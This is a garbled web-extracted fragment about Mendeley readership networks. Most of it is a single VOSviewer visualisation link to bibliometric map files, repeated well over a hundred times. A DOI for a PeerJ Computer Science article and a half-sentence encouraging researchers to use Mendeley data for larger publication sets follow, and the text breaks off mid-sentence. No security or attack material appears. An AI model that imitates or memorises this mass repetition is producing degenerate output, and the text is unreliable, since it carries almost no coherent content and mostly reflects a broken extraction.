http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig6_map.txt&network=http://www.leydesdorff.net/mendeley/fig6_net.txt&n_lines=10000&label_size=1.0&label_size_variation=0.34 http://dx.doi.org/10.7717/peerj-cs.32 encourage other researchers to use Mendeley data for larger publication sets in order to inspect usage structure of publications (Gunn, 2014). The Mendeley readership networks were generated by using different types of user 